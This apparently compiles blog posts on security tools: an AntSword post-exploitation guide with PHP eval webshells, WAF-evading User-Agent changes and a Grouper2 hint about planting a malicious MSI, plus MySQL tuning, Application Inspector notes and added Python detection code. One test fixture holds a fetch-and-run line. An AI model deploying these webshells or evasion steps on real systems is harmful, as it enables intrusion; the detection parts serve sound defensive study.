AntSword – a Security Tool for Post Exploitation

AntSword

AntSword is a very easy-to-use post-exploitation tool for pentesters and security teams; it can also be used by webmasters. Do not use this tool on unauthorized servers/environments or for illegal purposes. It can be a better alternative to Weevely.

Description from Official website

AntSword is an open source, cross-platform website administration tool, being designed to meet the needs of penetration testers together with security researchers with permissions and/or authorizations as well as webmasters.
 
No one shall use it for illegal purposes or for profit. Besides that, publishing unauthorized modified versions is also prohibited; violators will bear legal responsibility.

1 Installation

1.1 Download the correct zip file

The AntSword-Loader (or A launcher) can be downloaded here: https://github.com/AntSwordProject/AntSword-Loader

It can be used on Microsoft Windows, Linux and macOS platforms.

Windows AntSword

1.2 Install or unzip content

Here, we unzip to “C:\Users\win10\Desktop\as-4.0.3”

Unzip AntSword

1.3 Launch “AntSword.exe”

AntSword::Loader

1.4 Click on “Initialize” button

1.5 Select a working directory

In this example, we create a working directory named “working-dir” under the main directory, i.e. “C:\Users\win10\Desktop\as-4.0.3\working-dir”

Select the folder, then click on the “Select folder” button

It will start to download the necessary package (which is “antSword-master.zip”)

(You might encounter the following error)

Unzip Error Code: [object Object]

If you encounter this error, follow 1.5.1

1.5.1 Fix the error

Open the working directory we have just selected; a folder named “antSword-master” and a zip file named “antSword-master.zip” may be there. Delete them.

1.5.2 Launch the AntSword-Loader with Admin rights, then repeat Step 1.3 to Step 1.5.

We should be able to see the following screen

download successful Extracting file...

When it’s done

Set up successful Please manually restart later!

Then this window will disappear and the program will terminate by itself.

1.6 Now we can launch “AntSword.exe” again; it is ready to be used

2 Simple usage Demonstration

First, we need to deploy a webshell (sometimes called a backdoor or Trojan)

In this example we are going to use PHP

2.1 Create a php file “test.php”

2.2 Save following content to “test.php” file

<?php eval($_POST['mytestshell']); ?>

2.3 Upload it to your own testing server (please do not test on a production server or any server that does not belong to you)

2.4 Right click on blank space, click on “Add”

2.5 Enter correct server details

Shell url: the URL of your test.php

Shell pwd: the shell password, i.e. the key used in $_POST, “mytestshell” in this case

Shell type: PHP

2.6 Click on “Add” button

Add Shell

2.7 Now it will appear under “Shell Lists”

Shell Lists

2.8 Double-click on the item; we can now see all files on the server (as long as the user running the server process has the corresponding privileges)

View folders, files on the server

We can also upload files to and download files from the selected folder, create, modify and delete files and folders, and even open a terminal

AntSword connected to WebShell

3 Other

It also supports other Shell types besides PHP

Add shell - Shell type

Send customized HTTP Header/Body value

Add shell - HTTP Header, Body

Other settings

Add shell - Other

Proxy, Plugin Store, Encoder etc.

AntSword

AntSword official documentation: https://doc.u0u.us/en/getting_started/first_shell.html

Bonus 1 – Use AntSword with PHP get request

Wonder how to use AntSword with $_GET rather than $_POST in PHP?

Here is how

The PHP file

Rather than

<?php eval($_POST['mytestshell']); ?>

We use

<?php eval($_GET['mytestshell']); ?>

The Settings in AntSword

Shell url: http://xxxxxxxxxx.com/test.php?mytestshell=eval($_POST['mypswd']);

Shell pwd: mypswd

Bonus 2 – Modify User-Agents

By default, AntSword uses “antSword/v2.1” or “antSword/v2.0” as its User-Agent when updating the webshell information or connecting to the webshell, which a WAF or a human can recognize easily.

To change the User-Agent for AntSword:

There are 2 files and 3 places we need to modify

b2.1.1 File 1 is “request.js” under “X:\path\to\antsword\working-dir\antSword-master\modules\request.js”

Note: “working-dir” was created during Step 1.5

b2.1.2 Open “request.js” in Notepad or any text editor and search for “USER_AGENT”

b2.1.3 Change “antSword/v2.1” to whatever you like, then save the file

b2.2.1 File 2 is “update.js” under “X:\path\to\antsword\working-dir\antSword-master\modules\update.js”

b2.2.2 Open “update.js” in Notepad or any text editor and search for “User-Agent”

b2.2.3 Change “antSword/v2.0” to whatever you like, then save the file
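A defender-side complement to the above, added here and not part of AntSword: a Python check that flags the default AntSword User-Agents in web access logs and finds PHP files that feed request input straight into eval(), as test.php does. The log lines, PHP files and IP addresses are constructed samples.

```python
"""Detection for the artefacts described above: the AntSword default
User-Agents in access logs and eval()-on-request-input PHP webshells on disk.
Added example, not AntSword code; log lines and PHP files are constructed."""
import re

# Default User-Agents from request.js ("antSword/v2.1") and update.js ("antSword/v2.0").
ANTSWORD_UA = re.compile(r"antSword/v2\.[01]")

# Apache/nginx combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# eval() fed straight from a request superglobal, as in test.php above.
WEBSHELL_RE = re.compile(
    r"\beval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\[", re.IGNORECASE
)

# Constructed sample log (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
LOG_SAMPLE = """\
203.0.113.7 - - [10/Mar/2020:12:00:01 +0000] "POST /test.php HTTP/1.1" 200 512 "-" "antSword/v2.1"
203.0.113.7 - - [10/Mar/2020:12:00:05 +0000] "GET /test.php?mytestshell=eval(%24_POST%5B%27mypswd%27%5D)%3B HTTP/1.1" 200 88 "-" "antSword/v2.1"
198.51.100.4 - - [10/Mar/2020:12:01:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36"
"""

# Constructed PHP files: two shells in the shape shown above and one benign page.
PHP_SAMPLES = {
    "test.php": "<?php eval($_POST['mytestshell']); ?>",
    "get.php": "<?php eval($_GET['mytestshell']); ?>",
    "index.php": "<?php echo htmlspecialchars($_GET['q'] ?? ''); ?>",
}


def parse_log_line(line):
    """Split one combined-format line into fields, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def find_antsword_requests(lines):
    """(ip, method, path, ua) for every request carrying a default AntSword UA."""
    hits = []
    for line in lines:
        rec = parse_log_line(line)
        if rec and ANTSWORD_UA.search(rec["ua"]):
            hits.append((rec["ip"], rec["method"], rec["path"], rec["ua"]))
    return hits


def scan_php_sources(files):
    """Names of PHP sources that pass request input straight into eval()."""
    return sorted(name for name, src in files.items() if WEBSHELL_RE.search(src))


if __name__ == "__main__":
    for hit in find_antsword_requests(LOG_SAMPLE.splitlines()):
        print("AntSword UA:", hit)
    print("eval() webshells:", scan_php_sources(PHP_SAMPLES))
```

The User-Agent check only catches operators who kept the default (Bonus 2 shows how easily it changes), so pair it with the source scan and with file-integrity monitoring of the web root.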

Bonus 3 – Latest User-Agents

Chrome

on Windows

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on Linux

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on macOS

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on Android

Mozilla/5.0 (Linux; Android 8.0.0;) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Mobile Safari/537.36

on iOS

Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/80.0.3987.95 Mobile/15E148 Safari/605.1

Firefox

on Windows

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/74.0

on Linux

Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/74.0

on macOS

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/74.0

on Android

Mozilla/5.0 (Android 8.0.0; Mobile; rv:61.0) Gecko/61.0 Firefox/68.0

on iOS

Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/23.0 Mobile/16B92 Safari/605.1.15

IE 11/Internet Explorer 11 on Windows 10

Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko

Edge on Windows 10

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Edg/80.0.361.62

YandexBot

Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)


There are many more features we can utilize, including encoding/decoding, which is very helpful when trying to evade a Web Application Firewall (WAF), plugins, multipart payloads etc.

Warning: Do not use or test this tool on unauthorised servers.


How to: Optimize MySQL, MariaDB with Simple Tools

1 mysqltuner.pl

mysqltuner.pl

Supports MySQL, MariaDB, Percona Server etc. with over 300

It tunes MySQL performance by checking the configuration, including log file settings, storage engine and security settings, and outlines potential issues and fixes.

1.1 Download

cd /tmp

wget https://raw.githubusercontent.com/major/MySQLTuner-perl/master/mysqltuner.pl

chmod +x mysqltuner.pl

1.2 Usage

./mysqltuner.pl --socket /var/lib/mysql/mysql.sock

1.3 Output

Items marked with [!!] are important, e.g. “Maximum possible memory usage: 10G (300% of installed RAM)”

The last section, “Recommendations”, tells us where to look, which variables we should adjust and the suggested values.

mysqltuner.pl: https://github.com/major/MySQLTuner-perl

2 tuning-primer.sh

Similar to mysqltuner.pl.

Currently it handles recommendations for the following:

  • Slow Query Log
  • Max Connections
  • Worker Threads
  • Key Buffer [MyISAM only]
  • Query Cache
  • Sort Buffer
  • Joins
  • Temp Tables
  • Table (Open & Definition) Cache
  • Table Locking
  • Table Scans (read_buffer) [MyISAM only]
  • InnoDB Status

2.1 Download

cd /tmp

wget https://launchpad.net/mysql-tuning-primer/trunk/1.6-r1/+download/tuning-primer.sh

chmod +x tuning-primer.sh

2.2 Usage

./tuning-primer.sh

tuning-primer.sh: https://github.com/BMDan/tuning-primer.sh

3 pt-variable-advisor

Analyses MySQL variables and outputs suggestions based on them.

3.1 Download

https://www.percona.com/downloads/percona-toolkit/LATEST/

3.2 Usage

pt-variable-advisor localhost --socket /var/lib/mysql/mysql.sock

4 pt-query-digest

Analyses logs, the process list and tcpdump captures for MySQL queries. Mainly used to analyze slow queries. pt-query-digest outputs more details compared to py-query_digest.

4.1 Download

Same as “3 pt-variable-advisor”

4.2 Usage

pt-query-digest /var/lib/mysql/slowtest-slow.log

4.3 Other usages

# Analyze slow queries
pt-query-digest /var/lib/mysql/slowtest-slow.log > slow_report.log

# Queries within the last 24 hours
pt-query-digest --since=24h /var/lib/mysql/slowtest-slow.log > slow_report.log

# Queries within a specified time frame (--until must be later than --since)
pt-query-digest /var/lib/mysql/slowtest-slow.log --since '2020-01-01 00:00:00' --until '2020-01-10 00:00:00' > slow_report.log

# Slow queries starting with SELECT
pt-query-digest --filter '$event->{fingerprint} =~ m/^select/i' /var/lib/mysql/slowtest-slow.log > slow_report.log

# Queries from a specific user
pt-query-digest --filter '($event->{user} || "") =~ m/^root/i' /var/lib/mysql/slowtest-slow.log > slow_report.log

# All slow queries doing a full table scan or a full join
pt-query-digest --filter '(($event->{Full_scan} || "") eq "yes") || (($event->{Full_join} || "") eq "yes")' /var/lib/mysql/slowtest-slow.log > slow_report.log
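To show what pt-query-digest is doing with those filters, here is an added Python illustration (not Percona's code) that parses slow-log entries, fingerprints the queries and applies the same select-only, per-user and full-scan filters. The log excerpt is constructed; the Full_scan/Full_join attributes assume Percona Server's extended slow log and are absent in stock MySQL logs.

```python
"""Parse MySQL/Percona slow-query-log entries, fingerprint them and apply the
kinds of filters used with pt-query-digest above. Added illustration of what
the tool does, not its own code; the log excerpt is constructed."""
import re
from collections import defaultdict

SLOW_LOG_SAMPLE = """\
# Time: 2020-01-05T10:15:30.123456Z
# User@Host: root[root] @ localhost []  Id:    12
# Query_time: 3.512345  Lock_time: 0.000123 Rows_sent: 1  Rows_examined: 1000000
# QC_Hit: No  Full_scan: Yes  Full_join: No  Tmp_table: No  Tmp_table_on_disk: No
SET timestamp=1578219330;
SELECT * FROM orders WHERE customer_id = 42;
# Time: 2020-01-05T10:16:02.000000Z
# User@Host: app[app] @ 10.0.0.5 []  Id:    13
# Query_time: 1.200000  Lock_time: 0.000050 Rows_sent: 1  Rows_examined: 1
# QC_Hit: No  Full_scan: No  Full_join: No  Tmp_table: No  Tmp_table_on_disk: No
SET timestamp=1578219362;
SELECT * FROM orders WHERE customer_id = 7;
# Time: 2020-01-05T10:17:45.000000Z
# User@Host: root[root] @ localhost []  Id:    14
# Query_time: 12.000000  Lock_time: 0.100000 Rows_sent: 0  Rows_examined: 5000000
# QC_Hit: No  Full_scan: No  Full_join: Yes  Tmp_table: Yes  Tmp_table_on_disk: Yes
SET timestamp=1578219465;
UPDATE orders o JOIN customers c ON o.customer_id = c.id
  SET o.flag = 'x' WHERE c.name = 'bob';
"""

HEADER_RE = re.compile(r"([A-Za-z_]+):\s+(\S+)")   # "Key: value" pairs in '#' lines
USER_RE = re.compile(r"# User@Host: (\w+)\[")       # MySQL user before the [..]


def fingerprint(sql):
    """Simplified pt-query-digest fingerprint: lower-case, literals -> ?, one space."""
    s = sql.strip().rstrip(";").lower()
    s = re.sub(r"'(?:\\'|[^'])*'", "?", s)     # single-quoted strings
    s = re.sub(r'"(?:\\"|[^"])*"', "?", s)     # double-quoted strings
    s = re.sub(r"\b\d+(?:\.\d+)?\b", "?", s)   # numeric literals
    return re.sub(r"\s+", " ", s)


def _finish(hdr, sql_lines):
    sql = " ".join(sql_lines)
    return {
        "user": hdr.get("user", ""),
        "query": sql,
        "fingerprint": fingerprint(sql),
        "Query_time": float(hdr.get("Query_time", 0)),
        "Rows_examined": int(hdr.get("Rows_examined", 0)),
        "Full_scan": hdr.get("Full_scan", "No").lower() == "yes",
        "Full_join": hdr.get("Full_join", "No").lower() == "yes",
    }


def parse_slow_log(text):
    """One event dict per slow-log entry; an entry starts at a '# Time:' line."""
    events, hdr, sql_lines = [], {}, []
    for line in text.splitlines():
        if line.startswith("# Time:"):
            if sql_lines:
                events.append(_finish(hdr, sql_lines))
            hdr, sql_lines = {}, []
        if line.startswith("#"):
            m = USER_RE.match(line)
            if m:
                hdr["user"] = m.group(1)
            else:
                hdr.update(HEADER_RE.findall(line))
        elif line.startswith("SET timestamp="):
            continue                           # session bookkeeping, not the query
        elif line.strip():
            sql_lines.append(line.strip())
    if sql_lines:
        events.append(_finish(hdr, sql_lines))
    return events


# Predicates mirroring the --filter expressions used above.
def only_select(ev):
    return ev["fingerprint"].startswith("select")


def by_user(prefix):
    return lambda ev: ev["user"].lower().startswith(prefix.lower())


def full_scan_or_join(ev):
    return ev["Full_scan"] or ev["Full_join"]


def digest(events, pred=lambda ev: True):
    """Aggregate matching events per fingerprint, worst total time first."""
    agg = defaultdict(lambda: {"count": 0, "total_time": 0.0, "max_rows_examined": 0})
    for ev in events:
        if pred(ev):
            a = agg[ev["fingerprint"]]
            a["count"] += 1
            a["total_time"] += ev["Query_time"]
            a["max_rows_examined"] = max(a["max_rows_examined"], ev["Rows_examined"])
    return sorted(agg.items(), key=lambda kv: kv[1]["total_time"], reverse=True)


if __name__ == "__main__":
    evs = parse_slow_log(SLOW_LOG_SAMPLE)
    for fp, stats in digest(evs, full_scan_or_join):
        print(stats, fp)
```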

Open source/Free tools to find vulnerability in Active Directory (AD) – Grouper2

Grouper2 vs Grouper

Grouper

1 The computer must be joined to the domain with GPMC and RSAT installed

2 User must use Get-GPOReport with PowerShell to generate XML report

3 The report is required by Grouper

4 Users must manually filter out useful data

Grouper2

Grouper2 does not rely on Get-GPOReport, but it still needs to parse several different file formats.

1 More accurate file permission detection, no read/write of storage required

2 Won’t miss GPP passwords

3 Provides HTML format output

4 Multi-thread support

5 Supports offline mode

Official description

What is it for?

Grouper2 is a tool for pentesters to help find security-related misconfigurations in Active Directory Group Policy.

It might also be useful for other people doing other stuff, but it is explicitly NOT meant to be an audit tool. If you want to check your policy configs against some particular standard, you probably want Microsoft’s Security and Compliance Toolkit, not Grouper or Grouper2.

What does it do?

It dumps all the most interesting parts of group policy and then roots around in them for exploitable stuff.

How is it different from Grouper?

Where Grouper required you to:

  • have GPMC/RSAT/whatever installed on a domain-joined computer
  • generate an xml report with the Get-GPOReport PowerShell cmdlet
  • feed the report to Grouper
  • a bunch of gibberish falls out and hopefully there’s some good stuff in there.

Grouper2 does like Mr Ed suggests and goes straight to the source, i.e. SYSVOL.

This means you don’t have the horrible dependency on Get-GPOReport (hooray!) but it also means that it has to do a bunch of parsing of different file formats and so on (booo!).

Other cool new features:

  • better file permission checks that don’t involve writing to disk.
  • doesn’t miss those GPP passwords that Grouper 1 did.
  • HTML output option so you can preserve those sexy console colours and take them with you.
  • aim Grouper2 at an offline copy of SYSVOL if you want.
  • it’s multithreaded!
  • a bunch of other great stuff but it’s late and I’m tired.

Also, it’s written in C# instead of PowerShell.

How do I use it?

Literally just run the EXE on a domain joined machine in the context of a domain user, and magic JSON candy will fall out.

If the JSON burns your eyes, add -g to make it real pretty.

If you love the prettiness so much you wanna take it with you, do -f "$FILEPATH.html" to puke the candy into an HTML file.

If there’s too much candy and you want to limit output to only the tastiest morsels, set the ‘interest level’ with -i $INT, the bigger the number the tastier the candy, e.g. -i 10 will only give you stuff that will probably result in creds or shells.

If you don’t want to dig around in old policy and want to limit yourself to only current stuff, do -c.

If you want the candy to fall out faster, you can set the number of threads with -t $INT – the default is 10.

If you want to see the other options, do -h.

I don’t get it.

OK have a look at this:

A picture of some Grouper2 output

In the screenshot above we can see an “Assigned Application” policy that is still being pushed to computers, but the MSI file to install is missing, and the directory it’s being installed from is writable by the current user.

If you created a hacked up MSI (e.g. with msfvenom) and then modified it to match the UIDs at the bottom of the picture, it would get executed on machines targeted by the GPO. Sweet!

A picture of some Grouper2 output

In this one you can see that someone’s done something absolutely insane to the ACLs on the registry.

You get the picture.
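As an added illustration of the GPP password finding (own Python, not Grouper2's C#): sweep an offline SYSVOL copy for preference files that still carry a cpassword attribute. The domain name, GUIDs and cpassword values are placeholders; cpassword is encrypted with a key Microsoft published, so a hit means the credential is readable by anyone who can read SYSVOL, and the fix is removing the preference and rotating the account.

```python
"""Sweep an (offline) copy of SYSVOL for Group Policy Preference files that
still carry a cpassword attribute. Added illustration, not Grouper2 code;
the SYSVOL tree is built from constructed XML in a temporary directory."""
import os
import tempfile
import xml.etree.ElementTree as ET

# Preference files that may carry credentials (compared case-insensitively).
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "drives.xml", "printers.xml"}

# Constructed samples; cpassword values and GUIDs are placeholders, not real blobs.
GROUPS_WITH_CPASSWORD = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin" changed="2019-11-02 10:00:00" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="PLACEHOLDER_NOT_A_REAL_BLOB==" changeLogon="0" noChange="1"
                neverExpires="1" acctDisabled="0" userName="LocalAdmin"/>
  </User>
</Groups>
"""
GROUPS_CLEAN = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin" changed="2019-11-02 10:00:00" uid="{00000000-0000-0000-0000-000000000002}">
    <Properties action="U" newName="" fullName="" description="" acctDisabled="1" userName="LocalAdmin"/>
  </User>
</Groups>
"""
TASKS_WITH_CPASSWORD = """<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks>
  <Task name="NightlyBackup" changed="2019-11-02 10:00:00" uid="{00000000-0000-0000-0000-000000000003}">
    <Properties action="C" name="NightlyBackup" appName="backup.exe" runAs="svc_backup"
                cpassword="PLACEHOLDER_NOT_A_REAL_BLOB=="/>
  </Task>
</ScheduledTasks>
"""


def find_cpasswords(sysvol_root):
    """[(relative path, element tag, account, cpassword length)] for every element
    in a GPP file that has a non-empty cpassword attribute; the value itself is
    never printed or decrypted."""
    hits = []
    for dirpath, _, filenames in os.walk(sysvol_root):
        for fn in filenames:
            if fn.lower() not in GPP_FILES:
                continue
            path = os.path.join(dirpath, fn)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:
                continue                     # malformed file: log it, keep sweeping
            for el in root.iter():
                cp = el.get("cpassword")
                if cp:
                    account = el.get("userName") or el.get("accountName") or el.get("runAs") or "?"
                    hits.append((os.path.relpath(path, sysvol_root), el.tag, account, len(cp)))
    return sorted(hits)


def build_sample_sysvol():
    """Lay out two GPOs the way SYSVOL does: <domain>/Policies/{GUID}/Machine|User/Preferences/..."""
    root = tempfile.mkdtemp(prefix="sysvol_")
    policies = os.path.join(root, "example.local", "Policies")
    files = {
        "{00000000-0000-0000-0000-00000000AAAA}/Machine/Preferences/Groups/Groups.xml": GROUPS_WITH_CPASSWORD,
        "{00000000-0000-0000-0000-00000000AAAA}/User/Preferences/ScheduledTasks/ScheduledTasks.xml": TASKS_WITH_CPASSWORD,
        "{00000000-0000-0000-0000-00000000BBBB}/Machine/Preferences/Groups/Groups.xml": GROUPS_CLEAN,
        "{00000000-0000-0000-0000-00000000BBBB}/Machine/Preferences/Groups/README.txt": "cpassword= not xml",
    }
    for rel, content in files.items():
        full = os.path.join(policies, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for hit in find_cpasswords(build_sample_sysvol()):
        print("cpassword found:", hit)
```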

Resource

Official Github page


A Code Analysis Tool – ApplicationInspector

Introduction

Microsoft Application Inspector is a software source code analysis tool that helps identify and surface well-known features and other interesting characteristics of source code to aid in determining what the software is or what it does. It has received attention on ZDNet, SecurityWeek, CSOOnline, Linux.com/news, HelpNetSecurity, Twitter and more and was first featured on Microsoft.com.

Application Inspector is different from traditional static analysis tools in that it doesn’t attempt to identify “good” or “bad” patterns; it simply reports what it finds against a set of over 400 rule patterns for feature detection including features that impact security such as the use of cryptography and more. This can be extremely helpful in reducing the time needed to determine what Open Source or other components do by examining the source directly rather than trusting to limited documentation or recommendations.

The tool supports scanning various programming languages including C, C++, C#, Java, JavaScript, HTML, Python, Objective-C, Go, Ruby, PowerShell and more and can scan projects with mixed language files. It also includes HTML, JSON and text output formats with the default being an HTML report similar to the one shown here.

AppInspector-Features

It includes a filterable confidence indicator to help minimize false positive matches as well as customizable default rules and conditional match logic.

Be sure to see our project wiki page for more help https://Github.com/Microsoft/ApplicationInspector/wiki for illustrations and additional information and help.

Goals

Application Inspector helps inform you better for choosing the best components to meet your needs with a smaller footprint of unknowns for keeping your application attack surface smaller. It helps you to avoid inclusion of components with unexpected features you don’t want.

Application Inspector can help identify feature deltas or changes between component versions which can be critical for detecting injection of backdoors.

It can be used to automate detection of features of interest to identify components that require additional scrutiny as part of your build pipeline or create a repository of metadata regarding all of your enterprise application.

Basically, we created Application Inspector to help us identify risky third party software components based on their specific features, but the tool is helpful in many non-security contexts as well.

Application Inspector v1.0 is now in GENERAL AUDIENCE release status. Your feedback is important to us. If you’re interested in contributing, please review the CONTRIBUTING.md.

Contribute

We have a strong default starting base of Rules for feature detection. But there are many feature identification patterns yet to be defined and we invite you to submit ideas on what you want to see or take a crack at defining a few. This is a chance to literally impact the open source ecosystem helping provide a tool that everyone can use. See the Rules section of the wiki for more.

Getting Application Inspector

To use Application Inspector, download the relevant binary (either platform-specific or the multi-platform .NET Core release). If you use the .NET Core version, you will need to have .NET Core 3.0 or later installed. See the JustRunIt.md or Build.md files for help.

It might be valuable to consult the project wiki for additional background on Rules, Tags and more used to identify features. Tags are used as a systematic hierarchical nomenclature e.g. Cryptography.Protocol.TLS to more easily represent features.

Usage

Application Inspector is a command-line tool. Run it from a command line in Windows, Linux, or MacOS.

> dotnet AppInspector.dll or on *Windows* simply AppInspector.exe <command> <options>
Microsoft Application Inspector 1.0.25
ApplicationInspector 1.0.25
(c) Microsoft Corporation. All rights reserved
ERROR(S):
  No verb selected.
  analyze        Inspect source directory/file/compressed file (.tgz|zip) against defined characteristics
  tagdiff        Compares unique tag values between two source paths
  tagtest        Test presence of smaller set or custom tags in source (compare or verify modes)
  exporttags     Export default unique rule tags to view what features may be detected
  verifyrules    Verify rules syntax is valid
  help           Display more information on a specific command
  version        Display version information

Examples:

Command Help

Usage: dotnet AppInspector.dll [arguments] [options]
dotnet AppInspector.dll -description of available commands
dotnet AppInspector.dll <command> -options description for a given command

Analyze Command

Usage: dotnet AppInspector.dll analyze [arguments] [options]
Arguments:
 -s, --source-path             Required. Path to source code to inspect (required)
 -o, --output-file-path        Path to output file.  Ignored with -f html option which auto creates output.html
 -f, --output-file-format      Output format [html|json|text]. Default = html
 -e, --text-format             Match text format specifiers 
 -r, --custom-rules-path       Custom rules path
 -t, --tag-output-only         Output only contains identified tags. Default = false
 -i, --ignore-default-rules    Ignore default rules bundled with application. Default = false
 -d, --allow-dup-tags          Output only non-unique tag matches. Default = false
 -c, --confidence-filters      Output only matches with confidence [high|medium|low].  Default = high,medium
 -k, --file-path-exclusions    Exclude source files [none|<list>]. Default = sample,example,test,docs,.vs,.git
 -x, --console-verbosity       Console verbosity [high|medium|low|none].  Default = medium
 -l, --log-file-path           Log file path.  Default is <application path>/log.txt
 -v, --log-file-level          Log file level [Debug|Info|Warn|Error|Fatal|Off].  Default = Error
Scan a project directory, with output sent to “output.html” (default behavior includes launching default browser to this file)
dotnet AppInspector.dll analyze -s /home/user/myproject
Add custom rules (can be specified multiple times)
dotnet AppInspector.dll analyze -s /home/user/myproject -r /my/rules/directory -r /my/other/rules
Write to JSON format
dotnet AppInspector.dll analyze -s /home/user/myproject -f json

Tagdiff Command

Use to analyze and report on differences in tags (features) between two project or project versions e.g. v1, v2 to see what changed

Usage: dotnet AppInspector.dll tagdiff [arguments] [options]
Arguments:
 --src1                        Required. Source 1 to compare (required)
 --src2                        Required. Source 2 to compare (required)
 -t, --test-type               Type of test to run [equality|inequality].  Default = equality
 -r, --custom-rules-path       Custom rules path
 -i, --ignore-default-rules    Ignore default rules bundled with application.  Default = false
 -o, --output-file-path        Path to output file
 -x, --console-verbosity       Console verbosity [high|medium|low].  Default = medium
 -l, --log-file-path           Log file path
 -v, --log-file-level          Log file level [error|trace|debug|info].  Default = error
Simplest way to see the delta in tag features between two projects
dotnet AppInspector.dll tagdiff --src1 /home/user/project1 --src2 /home/user/project2
Basic use
dotnet AppInspector.dll tagdiff --src1 /home/user/project1 --src2 /home/user/project2 -t equality
Basic use
dotnet AppInspector.dll tagdiff --src1 /home/user/project1 --src2 /home/user/project2 -t inequality
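An added Python sketch (not Application Inspector's code) of the tag model behind analyze, tagdiff and tagtest: rules map patterns to hierarchical tags with a confidence, and diffing two versions' tag sets surfaces newly appeared features, the delta the Goals section relies on for spotting injected code. The rule schema, the rules and both project versions are my own constructed examples.

```python
"""Tag-based feature detection, tagdiff and tagtest in the spirit of
Application Inspector. Added illustration; the rule schema and rules are
mine, not the tool's rule set, and the projects are constructed in-memory."""
import os
import re

# Own simplified rule schema: (tag, regex, confidence, applicable extensions).
RULES = [
    ("Cryptography.Protocol.TLS", r"\bssl\.create_default_context\s*\(", "high", (".py",)),
    ("Cryptography.Algorithm.MD5", r"\bhashlib\.md5\s*\(", "high", (".py",)),
    ("OS.Process.DynamicExecution", r"\b(?:subprocess\.(?:Popen|run|call)|os\.system)\s*\(", "high", (".py",)),
    ("OS.Process.DynamicExecution", r"\beval\s*\(", "medium", (".py", ".js")),
    ("Data.Network.Outbound", r"\b(?:urllib\.request\.urlopen|requests\.(?:get|post)|socket\.create_connection)\s*\(", "high", (".py",)),
    ("Data.Parsing.JSON", r"\bjson\.(?:loads?|dumps?)\s*\(", "low", (".py",)),
]
CONF_RANK = {"low": 0, "medium": 1, "high": 2}

# Constructed project: v1, and v2 where util.py gained a fetch-and-run routine
# that the original component never had (the feature delta tagdiff should show).
PROJECT_V1 = {
    "app/main.py": "import json\nimport ssl\n\ndef load(cfg):\n    return json.loads(cfg)\n\n"
                   "ctx = ssl.create_default_context()\n",
    "app/util.py": "def add(a, b):\n    return a + b\n",
}
PROJECT_V2 = dict(PROJECT_V1)
PROJECT_V2["app/util.py"] = (
    "import subprocess\nimport urllib.request\n\ndef add(a, b):\n    return a + b\n\n"
    "def refresh():\n    data = urllib.request.urlopen('http://example.invalid/u').read()\n"
    "    subprocess.run(data.decode(), shell=True)\n"
)


def analyze(files, min_confidence="medium"):
    """{tag: [(path, line number, matched text), ...]} for hits at or above min_confidence."""
    hits = {}
    for path, src in files.items():
        ext = os.path.splitext(path)[1]
        for tag, pattern, conf, exts in RULES:
            if CONF_RANK[conf] < CONF_RANK[min_confidence] or ext not in exts:
                continue
            rx = re.compile(pattern)
            for lineno, line in enumerate(src.splitlines(), 1):
                m = rx.search(line)
                if m:
                    hits.setdefault(tag, []).append((path, lineno, m.group(0)))
    return hits


def tag_set(files, min_confidence="medium"):
    """Unique tags found in a source tree, the unit tagdiff compares."""
    return set(analyze(files, min_confidence))


def tagdiff(src1, src2, min_confidence="medium"):
    """Tags that appeared, disappeared or persisted between two source trees."""
    t1, t2 = tag_set(src1, min_confidence), tag_set(src2, min_confidence)
    return {"added": sorted(t2 - t1), "removed": sorted(t1 - t2), "common": sorted(t1 & t2)}


def tagtest(files, tags, test_type="rulespresent", min_confidence="medium"):
    """True if every tag is present (rulespresent) or none is (rulesnotpresent)."""
    present = tag_set(files, min_confidence)
    found = [t for t in tags if t in present]
    return len(found) == len(tags) if test_type == "rulespresent" else not found


if __name__ == "__main__":
    print(tagdiff(PROJECT_V1, PROJECT_V2))
```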

TagTest Command

Used to verify (pass/fail) that a specified set of rule tags is present or not present in a project e.g. user only wants to know true/false if cryptography is present as expected or if personal data is not present as expected and get a simple yes/no result rather than a full analysis report.

